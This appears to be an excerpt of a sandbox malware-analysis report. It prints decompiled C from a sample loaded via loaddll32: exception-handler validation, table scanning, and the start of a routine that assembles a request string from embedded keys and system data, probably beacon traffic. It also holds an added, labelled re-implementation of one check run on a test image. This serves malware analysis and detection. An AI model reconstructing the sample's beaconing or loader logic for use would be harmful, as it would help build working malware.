                                 									_t87 = _v32; // .AllocationBase (+0x4): start of the mapped image
                                 									__eflags =  *_t87 - 0x5a4d;
                                 									if( *_t87 != 0x5a4d) { // IMAGE_DOS_HEADER.e_magic "MZ"
                                 										goto L59;
                                 									}
                                 									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87; // e_lfanew -> IMAGE_NT_HEADERS
                                 									__eflags =  *_t71 - 0x4550;
                                 									if( *_t71 != 0x4550) { // "PE\0\0"
                                 										goto L59;
                                 									}
                                 									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
                                 									if( *((short*)(_t71 + 0x18)) != 0x10b) { // OptionalHeader.Magic must be PE32
                                 										goto L59;
                                 									}
                                 									_t78 = _t76 - _t87; // RVA of the table
                                 									__eflags =  *((short*)(_t71 + 6)); // FileHeader.NumberOfSections
                                 									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18; // first IMAGE_SECTION_HEADER = OptionalHeader + SizeOfOptionalHeader
                                 									if( *((short*)(_t71 + 6)) <= 0) {
                                 										goto L59;
                                 									}
                                 									_t72 =  *((intOrPtr*)(_t89 + 0xc)); // VirtualAddress of the first section
                                 									__eflags = _t78 - _t72;
                                 									if(_t78 < _t72) { // only the first section header is examined; an RVA outside it is accepted
                                 										goto L46;
                                 									}
                                 									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72; // VirtualSize + VirtualAddress
                                 									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
                                 										goto L46;
                                 									}
                                 									__eflags =  *(_t89 + 0x27) & 0x00000080; // top byte of Characteristics (+0x24): IMAGE_SCN_MEM_WRITE
                                 									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
                                 										goto L20; // table inside a writable section: reject
                                 									}
                                 									goto L46;
                                								}
                                							} else {
                                								goto L16;
                                							}
                                							while(1) {
                                								L16:
                                								__eflags =  *((intOrPtr*)(0xd4d2e8 + _t58 * 4)) - _t110;
                                								if( *((intOrPtr*)(0xd4d2e8 + _t58 * 4)) == _t110) {
                                									break;
                                								}
                                								_t58 = _t58 + 1;
                                								__eflags = _t58 - _t81;
                                								if(_t58 < _t81) {
                                									continue;
                                								}
                                								goto L18;
                                							}
                                							__eflags = _t58;
                                							if(_t58 <= 0) {
                                								goto L5;
                                							}
                                							 *0xd4d328 = 1;
                                							__eflags =  *0xd4d328;
                                							if( *0xd4d328 != 0) {
                                								goto L5;
                                							}
                                							__eflags =  *((intOrPtr*)(0xd4d2e8 + _t58 * 4)) - _t110;
                                							if( *((intOrPtr*)(0xd4d2e8 + _t58 * 4)) == _t110) {
                                								L32:
                                								_t100 = 0;
                                								__eflags = _t58;
                                								if(_t58 < 0) {
                                									L34:
                                									 *0xd4d328 = 0;
                                									goto L5;
                                								} else {
                                									goto L33;
                                								}
                                 								do { // same exchange-based rotation as above: move the cache hit to slot 0
                                 									L33:
                                 									_t90 = 0xd4d2e8 + _t100 * 4;
                                 									_t100 = _t100 + 1;
                                 									__eflags = _t100 - _t58;
                                 									 *_t90 = _t110;
                                 									_t110 =  *_t90;
                                 								} while (_t100 <= _t58);
                                								goto L34;
                                							}
                                							_t25 = _t81 - 1; // -1
                                							_t58 = _t25;
                                							__eflags = _t58;
                                							if(_t58 < 0) {
                                								L28:
                                								__eflags = _t81 - 0x10;
                                								if(_t81 < 0x10) {
                                									_t81 = _t81 + 1;
                                									__eflags = _t81;
                                									 *0xd4d2e0 = _t81;
                                								}
                                								_t28 = _t81 - 1; // 0x0
                                								_t58 = _t28;
                                								goto L32;
                                							} else {
                                								goto L25;
                                							}
                                							while(1) {
                                								L25:
                                								__eflags =  *((intOrPtr*)(0xd4d2e8 + _t58 * 4)) - _t110;
                                								if( *((intOrPtr*)(0xd4d2e8 + _t58 * 4)) == _t110) {
                                									break;
                                								}
                                								_t58 = _t58 - 1;
                                								__eflags = _t58;
                                								if(_t58 >= 0) {
                                									continue;
                                								}
                                								break;
                                							}
                                							__eflags = _t58;
                                							if(__eflags >= 0) {
                                								if(__eflags == 0) {
                                									goto L34;
                                								}
                                								goto L32;
                                							}
                                							goto L28;
                                						}
                                 						_t75 =  *((intOrPtr*)(_t108 - 8)); // saved stack pointer stored 8 bytes below the record
                                 						__eflags = _t75 - _v8;
                                 						if(_t75 < _v8) { // must be above StackLimit ...
                                 							goto L20;
                                 						}
                                 						__eflags = _t75 - _t108;
                                 						if(_t75 >= _t108) { // ... and below the record itself
                                 							goto L20;
                                 						}
                                 						goto L15;
                                					}
                                					L5:
                                					_t63 = 1;
                                					goto L60;
                                				} else {
                                					goto L3;
                                				}
                                			}
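                                 The decompiled routine above accepts the table only when NtQueryVirtualMemory reports image memory, and, if that page is writable, only when the PE section table shows the table's RVA outside a section flagged IMAGE_SCN_MEM_WRITE. The following is an added, portable re-implementation of that decision logic, written for this page; it is not code from the report, from Joe Sandbox or from the analysed sample. The constants are the documented Win32/PE values read off the decompilation; the image built in memory, the function names (classify_region, check_section, build_test_image, not_a_pe_image) and the all_sections flag are my own. With all_sections = 0 the walk examines only the first section header, exactly as the decompiled code does; all_sections = 1 extends the same test to every header, which goes beyond what the sample's code does.

```c
/* Added example: re-implementation of the MEM_IMAGE / section-writability
 * decision seen in E00D4B1E5, run against a constructed PE32 image.
 * Not the sample's code; names other than the Win32/PE constants are my own. */
#include <stdint.h>
#include <string.h>

#define MEM_IMAGE                     0x1000000u
#define WRITABLE_PROTECT_MASK         0xCCu   /* PAGE_READWRITE | PAGE_WRITECOPY |
                                                 PAGE_EXECUTE_READWRITE | PAGE_EXECUTE_WRITECOPY */
#define IMAGE_DOS_SIGNATURE           0x5A4Du /* "MZ"     */
#define IMAGE_NT_SIGNATURE            0x4550u /* "PE\0\0" */
#define IMAGE_NT_OPTIONAL_HDR32_MAGIC 0x10Bu
#define IMAGE_SCN_MEM_WRITE           0x80000000u

static uint16_t rd16(const uint8_t *p) { return (uint16_t)(p[0] | (p[1] << 8)); }
static uint32_t rd32(const uint8_t *p) {
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) | ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}
static void wr16(uint8_t *p, uint16_t v) { p[0] = (uint8_t)(v & 0xFF); p[1] = (uint8_t)(v >> 8); }
static void wr32(uint8_t *p, uint32_t v) { for (int i = 0; i < 4; i++) p[i] = (uint8_t)(v >> (8 * i)); }

/* Step 1: interpret the MEMORY_BASIC_INFORMATION fields the routine reads.
 * -1 = reject (not image memory), 0 = accept without a section walk,
 *  1 = page is writable, the section table decides. */
int classify_region(uint32_t mbi_type, uint32_t mbi_protect)
{
    if (mbi_type != MEM_IMAGE) return -1;
    return (mbi_protect & WRITABLE_PROTECT_MASK) ? 1 : 0;
}

/* Step 2: the section-table walk. 'rva' is table address minus AllocationBase,
 * as the decompiled code computes it. 1 = accept, 0 = reject (writable
 * section), -1 = malformed image (the routine returns -1 there as well).
 * all_sections = 0 mirrors the sample (first header only); 1 is my extension. */
int check_section(const uint8_t *image, uint32_t rva, int all_sections)
{
    if (rd16(image) != IMAGE_DOS_SIGNATURE) return -1;
    const uint8_t *nt = image + rd32(image + 0x3C);                 /* e_lfanew */
    if (rd32(nt) != IMAGE_NT_SIGNATURE) return -1;
    if (rd16(nt + 0x18) != IMAGE_NT_OPTIONAL_HDR32_MAGIC) return -1; /* PE32 only */
    int nsections = (int16_t)rd16(nt + 0x06);                        /* NumberOfSections, signed compare */
    if (nsections <= 0) return -1;
    const uint8_t *sec = nt + 0x18 + rd16(nt + 0x14);                /* OptionalHeader + SizeOfOptionalHeader */
    int limit = all_sections ? nsections : 1;
    for (int i = 0; i < limit; i++, sec += 40) {                     /* sizeof(IMAGE_SECTION_HEADER) == 40 */
        uint32_t va   = rd32(sec + 0x0C);                            /* VirtualAddress */
        uint32_t size = rd32(sec + 0x08);                            /* Misc.VirtualSize */
        if (rva < va || rva >= va + size) continue;                  /* not inside this section */
        return (rd32(sec + 0x24) & IMAGE_SCN_MEM_WRITE) ? 0 : 1;     /* Characteristics */
    }
    return 1;  /* outside every examined section: accepted, as in the sample */
}

/* Constructed PE32 image (not taken from the sample): ".text" (read/execute)
 * at RVA 0x1000 and ".data" (read/write) at RVA 0x2000, 0x1000 bytes each. */
static uint8_t g_image[0x200];

const uint8_t *build_test_image(void)
{
    memset(g_image, 0, sizeof g_image);
    wr16(g_image, IMAGE_DOS_SIGNATURE);
    wr32(g_image + 0x3C, 0x80);                            /* e_lfanew */
    uint8_t *nt = g_image + 0x80;
    wr32(nt, IMAGE_NT_SIGNATURE);
    wr16(nt + 0x06, 2);                                    /* NumberOfSections */
    wr16(nt + 0x14, 0xE0);                                 /* SizeOfOptionalHeader for PE32 */
    wr16(nt + 0x18, IMAGE_NT_OPTIONAL_HDR32_MAGIC);
    uint8_t *sec = nt + 0x18 + 0xE0;
    memcpy(sec, ".text", 5);
    wr32(sec + 0x08, 0x1000); wr32(sec + 0x0C, 0x1000);
    wr32(sec + 0x24, 0x60000020);                          /* CODE | EXECUTE | READ */
    sec += 40;
    memcpy(sec, ".data", 5);
    wr32(sec + 0x08, 0x1000); wr32(sec + 0x0C, 0x2000);
    wr32(sec + 0x24, 0xC0000040);                          /* INITIALIZED_DATA | READ | WRITE */
    return g_image;
}

/* A buffer with no MZ header, to exercise the malformed-image path. */
static const uint8_t g_not_pe[0x40];
const uint8_t *not_a_pe_image(void) { return g_not_pe; }
```

                                 The point worth taking from running it: with the sample's first-header-only walk, a table placed in the writable .data section of the constructed image is still accepted (check_section(..., 0x2010, 0) returns 1), while the extended walk rejects it; everything the decompilation treats as malformed (bad MZ/PE signatures, non-PE32 magic, zero sections) yields -1, matching the L59 return value.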

                                 Instruction address column for E00D4B1E5: 0x00d4b1ef to 0x00d4b402, one address per C line (0x00000000 where a line carries no instruction).
                                0x00000000
                                0x00d4b2e5
                                0x00d4b257
                                0x00d4b25a
                                0x00d4b25d
                                0x00000000
                                0x00000000
                                0x00d4b25f
                                0x00d4b261
                                0x00000000
                                0x00000000
                                0x00000000
                                0x00d4b261
                                0x00d4b226
                                0x00d4b228
                                0x00000000
                                0x00000000
                                0x00000000
                                0x00000000

                                APIs
                                • NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 00D4B296
                                Memory Dump Source
                                • Source File: 00000000.00000002.796535569.0000000000D41000.00000020.00020000.sdmp, Offset: 00D40000, based on PE: true
                                 • Associated: 00000000.00000002.796511171.0000000000D40000.00000004.00020000.sdmp
                                 • Associated: 00000000.00000002.796588201.0000000000D4C000.00000002.00020000.sdmp
                                 • Associated: 00000000.00000002.796607037.0000000000D4D000.00000004.00020000.sdmp
                                 • Associated: 00000000.00000002.796628462.0000000000D4F000.00000002.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d40000_loaddll32.jbxd
                                Similarity
                                • API ID: MemoryQueryVirtual
                                • String ID:
                                • API String ID: 2850889275-0
                                • Opcode ID: f5c7f7ea37dbd6343912b162492a4391fed88a0fd3ce0ec3beda3ce553655a18
                                • Instruction ID: 7bb24437bbdf59b2d27992eb1d9db3d14822aac4cabe17d6e83b0de4cc706321
                                • Opcode Fuzzy Hash: f5c7f7ea37dbd6343912b162492a4391fed88a0fd3ce0ec3beda3ce553655a18
                                • Instruction Fuzzy Hash: 3B61B5316006069FDB19CF2DD8D463D73A6EBA6338F28852BD495C7691E7B0DC42C678
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.795811026.0000000000910000.00000040.00000001.sdmp, Offset: 00910000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_910000_loaddll32.jbxd
                                Similarity
                                • API ID:
                                • String ID: t32c
                                • API String ID: 0-3674199949
                                • Opcode ID: 99c35cf172511bbd92e7d6a7d234468ffbc3ce4bde2787b016b380336507cf81
                                • Instruction ID: 1c33eca53bbb74f53274983b40ac922cbbc159ac8beddc907b9d8bb48a73cb32
                                • Opcode Fuzzy Hash: 99c35cf172511bbd92e7d6a7d234468ffbc3ce4bde2787b016b380336507cf81
                                • Instruction Fuzzy Hash: E2514836A0021ADFEF14CF84DD84BA9B7B9FF84324F199195D8086B216D371AEC5DB90
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.795811026.0000000000910000.00000040.00000001.sdmp, Offset: 00910000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_910000_loaddll32.jbxd
                                Similarity
                                • API ID:
                                • String ID: t32c
                                • API String ID: 0-3674199949
                                • Opcode ID: a1d9a42090d8c36ff833a99ab1176823e0b3ab7c5e652fae9d09e90f8e3ad70c
                                • Instruction ID: 37dd45bf250515504a2418d99d029e8ae92103eab7968462c4db6c89afb1d2f3
                                • Opcode Fuzzy Hash: a1d9a42090d8c36ff833a99ab1176823e0b3ab7c5e652fae9d09e90f8e3ad70c
                                • Instruction Fuzzy Hash: 5E514A72A0021ADFDF20CF44CD84BA9B7B9FF88314F198595D9496B212D3B1AEC5DB80
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.795811026.0000000000910000.00000040.00000001.sdmp, Offset: 00910000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_910000_loaddll32.jbxd
                                Similarity
                                • API ID:
                                • String ID: t32c
                                • API String ID: 0-3674199949
                                • Opcode ID: 815c5047575feb08699417f69d0f17cbf477ce9da8faa060a24343471615705c
                                • Instruction ID: ca969056869c3e4d3fa4c631c1128ad3630df8f98b396ad19517be729f9a5b1c
                                • Opcode Fuzzy Hash: 815c5047575feb08699417f69d0f17cbf477ce9da8faa060a24343471615705c
                                • Instruction Fuzzy Hash: 8C415A76A00219DFEB20CF94CD84BA9B7B9FF88724F188595D9096B256C371AEC1CF50
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.795811026.0000000000910000.00000040.00000001.sdmp, Offset: 00910000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_910000_loaddll32.jbxd
                                Similarity
                                • API ID:
                                • String ID: t32c
                                • API String ID: 0-3674199949
                                • Opcode ID: 5729f38530edfeb47ae83503f7da0dbcd19f44cb695773290700f1287b00e58e
                                • Instruction ID: 31fbc96855655362da71ca79f9f75cbeb445a040c688cfe7c6b245b58a6bd5a5
                                • Opcode Fuzzy Hash: 5729f38530edfeb47ae83503f7da0dbcd19f44cb695773290700f1287b00e58e
                                • Instruction Fuzzy Hash: 21415E75A0021ADFDF20CF44DD84BA8B7B5FF88324F159595D9086B216D3B5AEC5CB80
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Memory Dump Source
                                • Source File: 00000000.00000002.795811026.0000000000910000.00000040.00000001.sdmp, Offset: 00910000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_910000_loaddll32.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: d0ab5939c17571c0ae3b6999921ebd3ea3ecc7652e36932efdc0a7ad6381d8d7
                                • Instruction ID: 4442b3ed00ffc62e2175c1f9a55588769553e05ad43fe3c80ca00b05b11b60fb
                                • Opcode Fuzzy Hash: d0ab5939c17571c0ae3b6999921ebd3ea3ecc7652e36932efdc0a7ad6381d8d7
                                • Instruction Fuzzy Hash: CE2163438073417BEF80147CA49A3C7A3E2D753B91FE57829C4848399BA41E3B6F7242
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Memory Dump Source
                                • Source File: 00000000.00000002.795811026.0000000000910000.00000040.00000001.sdmp, Offset: 00910000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_910000_loaddll32.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 117ded5a4771bf824923cd602bcece8b90c303a5c8ee0e0eed6df61f92816359
                                • Instruction ID: f8cf89903568956ec34065974c46de42842ce30694422d3e601bc842e44d302e
                                • Opcode Fuzzy Hash: 117ded5a4771bf824923cd602bcece8b90c303a5c8ee0e0eed6df61f92816359
                                • Instruction Fuzzy Hash: 782143538073457BEF80147CA45A3C7A3E2D757B91FE57819C4848399BA41E3B6F7242
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 71%
                                			E100021B4(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
                                				intOrPtr _v8;
                                				char _v12;
                                				void* __ebp;
                                				signed int* _t43;
                                				char _t44;
                                				void* _t46;
                                				void* _t49;
                                				intOrPtr* _t53;
                                 				void* _t54;
                                 				void* _t55;
                                				void* _t65;
                                				long _t66;
                                				signed int* _t80;
                                				signed int* _t82;
                                				void* _t84;
                                				signed int _t86;
                                				void* _t89;
                                				void* _t95;
                                				void* _t96;
                                				void* _t99;
                                				void* _t106;
                                
                                				_t43 = _t84;
                                				_t65 = __ebx + 2;
                                				 *_t43 =  *_t43 ^ __edx ^  *__eax;
                                				_t89 = _t95;
                                				_t96 = _t95 - 8;
                                				_push(_t65);
                                				_push(_t84);
                                				_push(_t89);
                                				asm("cld");
                                				_t66 = _a8;
                                				_t44 = _a4;
                                				if(( *(_t44 + 4) & 0x00000006) != 0) {
                                					_push(_t89);
                                					E1000231B(_t66 + 0x10, _t66, 0xffffffff);
                                					_t46 = 1;
                                				} else {
                                					_v12 = _t44;
                                					_v8 = _a12;
                                					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
                                					_t86 =  *(_t66 + 0xc);
                                					_t80 =  *(_t66 + 8);
                                					_t49 = E100023D5(_t66);
                                					_t99 = _t96 + 4;
                                					if(_t49 == 0) {
                                						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
                                						goto L11;
                                					} else {
                                						while(_t86 != 0xffffffff) {
                                							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
                                							if(_t53 == 0) {
                                								L8:
                                								_t80 =  *(_t66 + 8);
                                								_t86 = _t80[_t86 + _t86 * 2];
                                								continue;
                                							} else {
                                								_t54 =  *_t53();
                                								_t89 = _t89;
                                								_t86 = _t86;
                                								_t66 = _a8;
                                								_t55 = _t54;
                                								_t106 = _t54;
                                								if(_t106 == 0) {
                                									goto L8;
                                								} else {
                                									if(_t106 < 0) {
                                										_t46 = 0;
                                									} else {
                                										_t82 =  *(_t66 + 8);
                                										E100022C0(_t55, _t66);
                                										_t89 = _t66 + 0x10;
                                										E1000231B(_t89, _t66, 0);
                                										_t99 = _t99 + 0xc;
                                										E100023B7(_t82[2]);
                                										 *(_t66 + 0xc) =  *_t82;
                                										_t66 = 0;
                                										_t86 = 0;
                                										 *(_t82[2])(1);
                                										goto L8;
                                									}
                                								}
                                							}
                                							goto L13;
                                						}
                                						L11:
                                						_t46 = 1;
                                					}
                                				}
                                				L13:
                                				return _t46;
                                			}

                                Memory Dump Source
                                • Source File: 00000000.00000002.797650137.0000000010000000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                 • Associated: 00000000.00000002.797669903.0000000010005000.00000040.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
                                • Instruction ID: 998f964cf8a00a12d388af1eaf269aed7343e4ee342723e71f6604d3686ecfb7
                                • Opcode Fuzzy Hash: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
                                • Instruction Fuzzy Hash: 7821CB37904204AFDB10DFA8C8C09ABF7A5FF49390B468168DD159B249D730FA15C7E0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 71%
                                			E00D4AFC0(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
                                				intOrPtr _v8;
                                				char _v12;
                                				void* __ebp;
                                				signed int* _t43;
                                				char _t44;
                                				void* _t46;
                                				void* _t49;
                                				intOrPtr* _t53;
                                 				void* _t54;
                                 				void* _t55;
                                				void* _t65;
                                				long _t66;
                                				signed int* _t80;
                                				signed int* _t82;
                                				void* _t84;
                                				signed int _t86;
                                				void* _t89;
                                				void* _t95;
                                				void* _t96;
                                				void* _t99;
                                				void* _t106;
                                
                                				_t43 = _t84;
                                				_t65 = __ebx + 2;
                                				 *_t43 =  *_t43 ^ __edx ^  *__eax;
                                				_t89 = _t95;
                                				_t96 = _t95 - 8;
                                				_push(_t65);
                                				_push(_t84);
                                				_push(_t89);
                                				asm("cld");
                                				_t66 = _a8;
                                				_t44 = _a4;
                                				if(( *(_t44 + 4) & 0x00000006) != 0) {
                                					_push(_t89);
                                					E00D4B12B(_t66 + 0x10, _t66, 0xffffffff);
                                					_t46 = 1;
                                				} else {
                                					_v12 = _t44;
                                					_v8 = _a12;
                                					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
                                					_t86 =  *(_t66 + 0xc);
                                					_t80 =  *(_t66 + 8);
                                					_t49 = E00D4B1E5(_t66);
                                					_t99 = _t96 + 4;
                                					if(_t49 == 0) {
                                						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
                                						goto L11;
                                					} else {
                                						while(_t86 != 0xffffffff) {
                                							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
                                							if(_t53 == 0) {
                                								L8:
                                								_t80 =  *(_t66 + 8);
                                								_t86 = _t80[_t86 + _t86 * 2];
                                								continue;
                                							} else {
                                								_t54 =  *_t53();
                                								_t89 = _t89;
                                								_t86 = _t86;
                                								_t66 = _a8;
                                								_t55 = _t54;
                                								_t106 = _t54;
                                								if(_t106 == 0) {
                                									goto L8;
                                								} else {
                                									if(_t106 < 0) {
                                										_t46 = 0;
                                									} else {
                                										_t82 =  *(_t66 + 8);
                                										E00D4B0D0(_t55, _t66);
                                										_t89 = _t66 + 0x10;
                                										E00D4B12B(_t89, _t66, 0);
                                										_t99 = _t99 + 0xc;
                                										E00D4B1C7(_t82[2]);
                                										 *(_t66 + 0xc) =  *_t82;
                                										_t66 = 0;
                                										_t86 = 0;
                                										 *(_t82[2])(1);
                                										goto L8;
                                									}
                                								}
                                							}
                                							goto L13;
                                						}
                                						L11:
                                						_t46 = 1;
                                					}
                                				}
                                				L13:
                                				return _t46;
                                			}

                                Memory Dump Source
                                • Source File: 00000000.00000002.796535569.0000000000D41000.00000020.00020000.sdmp, Offset: 00D40000, based on PE: true
                                 • Associated: 00000000.00000002.796511171.0000000000D40000.00000004.00020000.sdmp
                                 • Associated: 00000000.00000002.796588201.0000000000D4C000.00000002.00020000.sdmp
                                 • Associated: 00000000.00000002.796607037.0000000000D4D000.00000004.00020000.sdmp
                                 • Associated: 00000000.00000002.796628462.0000000000D4F000.00000002.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d40000_loaddll32.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
                                • Instruction ID: 3cfa58f7dbcb485be2871ecc4adea594f5400083ec9326ff2a21efc383111c35
                                • Opcode Fuzzy Hash: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
                                • Instruction Fuzzy Hash: E821B6329002049BCB14EF68C8C09A7BBA5FF55360B098569ED659B246D730FA15CBF0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Memory Dump Source
                                • Source File: 00000000.00000002.795811026.0000000000910000.00000040.00000001.sdmp, Offset: 00910000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_910000_loaddll32.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 37f5b1033e76e2b6b36c1d4338148d8c6e4043e22c5ea1391d20c78c90c4df38
                                • Instruction ID: 046bd1c2d6fc4dfd2834609802aae3f3461f5778012b7cefe1e216c78a2818ea
                                • Opcode Fuzzy Hash: 37f5b1033e76e2b6b36c1d4338148d8c6e4043e22c5ea1391d20c78c90c4df38
                                • Instruction Fuzzy Hash: A7E01234E011198BCF20D5108D4A6AAB3F5ABCC315F1440D4C41D733508671BDC5CE41
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Memory Dump Source
                                • Source File: 00000000.00000002.795811026.0000000000910000.00000040.00000001.sdmp, Offset: 00910000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_910000_loaddll32.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 0ad46a0b49349d618c0a572f2f45aab2f8f951c7b69cb57b2fbf92d7413da058
                                • Instruction ID: bd87a8dc77193d2315adc65fab6fbaacc91a82f595b59cb90503cbbe65ecd256
                                • Opcode Fuzzy Hash: 0ad46a0b49349d618c0a572f2f45aab2f8f951c7b69cb57b2fbf92d7413da058
                                • Instruction Fuzzy Hash: 66E0B6B6901118FEFF168A44CD44FFAB7BDEBC8700F1480E6F609AA050C6315E808F20
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 74%
                                			E00D45450(long __eax, void* __ecx, void* __edx, intOrPtr _a4, char** _a8, int* _a12, void* _a16) {
                                				void* _v8;
                                				signed int _v12;
                                				void* _v16;
                                				void* _v20;
                                				void* _v24;
                                				void* _v28;
                                				void* __ebx;
                                				void* __edi;
                                				long _t59;
                                				intOrPtr _t60;
                                				intOrPtr _t61;
                                				intOrPtr _t62;
                                				intOrPtr _t63;
                                				intOrPtr _t64;
                                				void* _t67;
                                				intOrPtr _t68;
                                				int _t71;
                                				void* _t72;
                                				void* _t73;
                                				void* _t75;
                                				void* _t78;
                                				intOrPtr _t82;
                                				intOrPtr _t86;
                                				intOrPtr* _t88;
                                				void* _t94;
                                				intOrPtr _t100;
                                				signed int _t104;
                                				char** _t106;
                                				int _t109;
                                				intOrPtr* _t112;
                                				intOrPtr* _t114;
                                				intOrPtr* _t116;
                                				intOrPtr* _t118;
                                				intOrPtr _t121;
                                				intOrPtr _t126;
                                				int _t130;
                                				CHAR* _t132;
                                				intOrPtr _t133;
                                				void* _t134;
                                				void* _t143;
                                				int _t144;
                                				void* _t145;
                                				intOrPtr _t146;
                                				void* _t148;
                                				long _t152;
                                				intOrPtr* _t153;
                                				intOrPtr* _t154;
                                				intOrPtr* _t157;
                                				void* _t158;
                                				void* _t160;
                                
                                				_t143 = __edx;
                                				_t134 = __ecx;
                                				_t59 = __eax;
                                				_v12 = 8;
                                				if(__eax == 0) {
                                					_t59 = GetTickCount();
                                				}
                                				_t60 =  *0xd4d018; // 0xefcf766a
                                				asm("bswap eax");
                                				_t61 =  *0xd4d014; // 0x3a87c8cd
                                				_t132 = _a16;
                                				asm("bswap eax");
                                				_t62 =  *0xd4d010; // 0xd8d2f808
                                				asm("bswap eax");
                                				_t63 = E00D4D00C; // 0xeec43f25
                                				asm("bswap eax");
                                				_t64 =  *0xd4d2a8; // 0x253a5a8
                                				_t3 = _t64 + 0xd4e633; // 0x74666f73
                                				_t144 = wsprintfA(_t132, _t3, 3, 0x3d163, _t63, _t62, _t61, _t60,  *0xd4d02c,  *0xd4d004, _t59);
                                				_t67 = E00D43288();
                                				_t68 =  *0xd4d2a8; // 0x253a5a8
                                				_t4 = _t68 + 0xd4e673; // 0x74707526
                                				_t71 = wsprintfA(_t144 + _t132, _t4, _t67);
                                				_t160 = _t158 + 0x38;
                                				_t145 = _t144 + _t71;
                                				_t72 = E00D4831C(_t134);
                                				_t133 = __imp__; // 0x74e05520
                                				_v8 = _t72;
                                				if(_t72 != 0) {
                                					_t126 =  *0xd4d2a8; // 0x253a5a8
                                					_t7 = _t126 + 0xd4e8d4; // 0x736e6426
                                					_t130 = wsprintfA(_a16 + _t145, _t7, _t72);
                                					_t160 = _t160 + 0xc;
                                					_t145 = _t145 + _t130;
                                					HeapFree( *0xd4d238, 0, _v8);
                                				}
                                				_t73 = E00D49267();
                                				_v8 = _t73;
                                				if(_t73 != 0) {
                                					_t121 =  *0xd4d2a8; // 0x253a5a8
                                					_t11 = _t121 + 0xd4e8dc; // 0x6f687726
                                					wsprintfA(_t145 + _a16, _t11, _t73);
                                					_t160 = _t160 + 0xc;
                                					HeapFree( *0xd4d238, 0, _v8);
                                				}
                                				_t146 =  *0xd4d32c; // 0x32895b0
                                				_t75 = E00D4284E(0xd4d00a, _t146 + 4);
                                				_t152 = 0;
                                				_v20 = _t75;
                                				if(_t75 == 0) {
                                					L26:
                                					HeapFree( *0xd4d238, _t152, _a16);
                                					return _v12;
                                				} else {
                                					_t78 = RtlAllocateHeap( *0xd4d238, 0, 0x800);
                                					_v8 = _t78;
                                					if(_t78 == 0) {
                                						L25:
                                						HeapFree( *0xd4d238, _t152, _v20);
                                						goto L26;
                                					}
                                					E00D43239(GetTickCount());
                                					_t82 =  *0xd4d32c; // 0x32895b0
                                					__imp__(_t82 + 0x40);
                                					asm("lock xadd [eax], ecx");
                                					_t86 =  *0xd4d32c; // 0x32895b0
                                					__imp__(_t86 + 0x40);
                                					_t88 =  *0xd4d32c; // 0x32895b0
                                					_t148 = E00D47B8D(1, _t143, _a16,  *_t88);
                                					_v28 = _t148;
                                					asm("lock xadd [eax], ecx");
                                					if(_t148 == 0) {
                                						L24:
                                						HeapFree( *0xd4d238, _t152, _v8);
                                						goto L25;
                                					}
